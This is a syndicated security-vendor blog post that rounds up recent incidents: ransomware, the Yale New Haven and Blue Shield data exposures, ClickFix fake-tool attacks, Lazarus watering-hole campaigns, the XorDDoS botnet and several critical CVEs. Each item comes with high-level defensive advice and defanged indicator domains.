What Cybercriminals Have Been Up to Lately (And Why It Should Worry You)
If you’re skimming headlines thinking “another week, another breach,” you’re not wrong. From 5.5 million patient records stolen at a major U.S. health network to cybercrooks impersonating Microsoft to push ransomware, the past two weeks in cybersecurity have been… let’s just say eventful.
This blog is a snapshot, your curated tour of what really matters from ColorTokens’ latest threat intelligence brief (May 2025 Issue #2). If you’re short on time but big on security, here’s what you need to know to stay breach ready.
Ransomware, Red Flags, and $80K Demands
A major biotech firm’s entire operation was frozen in place—servers locked, data copied, and an $80,000 demand emailed in. The attackers encrypted all 15 of the company’s servers and threatened to wipe everything if a ransom wasn’t paid in 72 hours.
Investigators traced it back to a phishing email, and the pattern was textbook: an unpatched system, no offline backup, and a glaring hole in their firewall. Lesson? Ransomware isn’t just a tech problem. It’s a business continuity crisis waiting to happen.
What you can do:
- Backup critical data offline
- Train teams to spot phishing attempts
- Follow new security audit norms in your region
Strengthening Cyber Defense in Healthcare
A CTO’s Real-World Perspective on Microsegmentation
Chuck Suitor, the former CTO of MD Anderson Cancer Center, shares what it really takes to protect a healthcare enterprise from ransomware, insider threats, and advanced cyberattacks.
Yale New Haven Health: 5.5 Million Patient Records Gone
Another day, another hospital system breached. Yale New Haven Health confirmed a massive data breach that compromised patient names, SSNs, email addresses—even medical record numbers. While patient care wasn’t affected, the reputational damage is irreversible.
What’s worse? Nobody knows who did it. And yes, class-action lawsuits are already in the works.
Key takeaways:
- Improve segmentation to isolate sensitive data (learn how to achieve digital ops resilience in healthcare)
- Encrypt everything—both at rest and in transit
- Audit your vendor ecosystem. Trust, but verify.
Want the full list of vulnerabilities, IOCs, and remediation steps? Download the full threat intelligence brief.
The Rise of ClickFix: When “Fix It” Means “You’re Owned”
Here’s a new trick straight from the Interlock ransomware gang: fake IT tools. You visit what looks like a legit Microsoft Teams or IP Scanner page. It says “Fix error—run this command.” And boom, you’ve just installed malware via PowerShell.
It’s called a ClickFix attack—and it’s as sneaky as it sounds.
Once installed, the malware deploys a remote access trojan (RAT), steals your files, and schedules a ransomware payload to detonate at 8 PM sharp.
Block these domains ASAP:
- microsoft-msteams[.]com
- advanceipscaner[.]com
And for the love of digital hygiene: don’t run random PowerShell commands.
Also Read | Business Resilience Starts with Breach Readiness
Blue Shield of California Accidentally Shared Health Data—With Google Ads
Yup. It wasn’t even a hack. From April 2021 to January 2024, misconfigured Google Analytics tags ended up leaking data from 4.7 million members to Google Ads.
Let that sink in: family size, insurance plan details, and even claim histories—handed over in the name of “personalization.” No external hackers required.
Why this matters:
- Not all breaches are caused by outsiders
- Misconfigurations can be just as dangerous
- Privacy must be part of your marketing and IT conversations
Lazarus Group Targets South Korea with Watering Hole Attacks
North Korea’s Lazarus Group is back, and they’ve been busy. Their latest campaign, dubbed Operation SyncHole, compromised legitimate South Korean websites and redirected visitors to fake software portals that silently loaded malware.
At least six companies across IT, finance, and telecom got hit. The payload? A sneaky backdoor called ThreatNeedle that collects everything from system info to keystrokes—and gives attackers full remote control.
How they did it:
- Exploited an old vulnerability in a popular file transfer client
- Used fake software sites to deliver the malware
- Jumped laterally inside networks using stolen credentials
If you work in a regulated or high-tech industry, double down on patching and endpoint monitoring. This was espionage, not extortion.
Also Read | How to Prevent Ransomware from Affecting Your Network
Think IoT Is Safe? XorDDoS Begs to Differ
Over 70% of attacks from the notorious XorDDoS botnet now target systems in the U.S., hitting everything from Linux servers to Docker containers and even IoT devices.
The infection method is ancient but effective: SSH brute force. Once in, it sets up persistence, connects to a Chinese-controlled command center, and turns your device into a DDoS zombie.
Simple fixes that work:
- Never allow SSH root logins
- Use MFA for server access
- Segment your IoT devices on separate VLANs
Also, rate-limit incoming traffic and use cloud-based DDoS protection if you’re hosting customer-facing apps.
Critical CVEs You Shouldn’t Ignore
Some bugs just refuse to be quiet. A few highlights from this week’s hall of shame:
- CVE-2025-31324 (SAP NetWeaver): Zero-day file upload bug. RCE via malicious JSP shell. Patch now.
- CVE-2024-36347 (AMD Zen 5): Flawed signature verification. BIOS updates rolling out.
- CVE-2025-0665 (libcurl): Double-close issue. Crashes or DoS possible.
- CVE-2025-22457 (Ivanti VPN): Wildly exploited buffer overflow. Malware linked.
- CVE-2025-29824 (Windows CLFS): Elevation of privilege. Exploited in attacks already.
Check the full threat intelligence report for all the nitty-gritty.
Breach Readiness Isn’t Optional
Every breach in this report had one thing in common: the attackers didn’t break in—they walked in through the front (or side) door left wide open. Whether it’s a phishing email, a missed patch, or a misconfigured web tool, the point is clear—proactive defense is cheaper than damage control.
So what should you do?
- Patch fast, patch often
- Segment like your business depends on it (because it does)
- Go Zero Trust—or go home
- Educate your people. They’re your best firewall
Stay safe. Stay sharp. Stay breach ready.
If you want to know about breach readiness strategies, feel free to reach out to us here.
The post What Cybercriminals Have Been Up to Lately (And Why It Should Worry You) appeared first on ColorTokens.
*** This is a Security Bloggers Network syndicated blog from ColorTokens authored by ColorTokens Editorial Team. Read the original post at: https://colortokens.com/blogs/enterprise-ransomware-protection-insights/
